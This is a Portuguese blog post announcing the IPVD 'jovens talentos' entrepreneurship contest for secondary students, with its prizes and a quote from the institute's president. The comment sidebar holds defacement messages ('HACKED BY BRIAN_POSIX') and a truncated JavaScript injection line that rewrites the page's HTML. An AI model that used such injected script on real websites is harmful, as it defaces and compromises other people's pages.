O Instituto Português de Venda Direta (IPVD) promove pela primeira vez um concurso nacional dirigido aos estudantes do ensino secundário, do 10º ao 12º ano, e do ensino técnico-profissional, que tem decorrido em todo o país.

A iniciativa intitulada ipvd jovens talentos que decorre até ao final do ano – 31 de dezembro – pretende estimular o espírito empreendedor e criativo desta comunidade. É um projeto pedagógico, sem qualquer fim lucrativo e, que está a decorrer em todas as escolas secundárias nacionais.

Neste concurso serão atribuídos três prémios aos três melhores trabalhos, dos quais o primeiro terá o valor de 3.000,00 euros, o segundo prémio, o valor de 2.000,00 euros e o terceiro, o valor de 1.000,00 euros.

O ipvd jovens talentos pretende essencialmente alertar os jovens para começarem a pensar no seu futuro e na hipótese real de terem um apoio monetário alternativo, sem estarem dependentes de uma entidade empregadora. Para além de terem a possibilidade de ganhar até 3.000 euros neste concurso, para realizarem os seus desejos a curto prazo, é também um convite para conhecerem as vantagens deste canal de distribuição, que está a crescer cada vez mais em Portugal”, declara Gertrudes Soares, presidente do Instituto Português de Venda Direta.

 

Não perca nada deste evento único e empreendedor no Mais Mulher, às 17:30 na Sic Mulher!

 

Veja o vídeo aqui!



De
 
Nome

Url

Email

Guardar Dados?

Ainda não tem um Blog no SAPO? Crie já um. É grátis.

Comentário

Máximo de 4300 caracteres



Copiar caracteres

 



O dono deste Blog optou por gravar os IPs de quem comenta os seus posts.

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO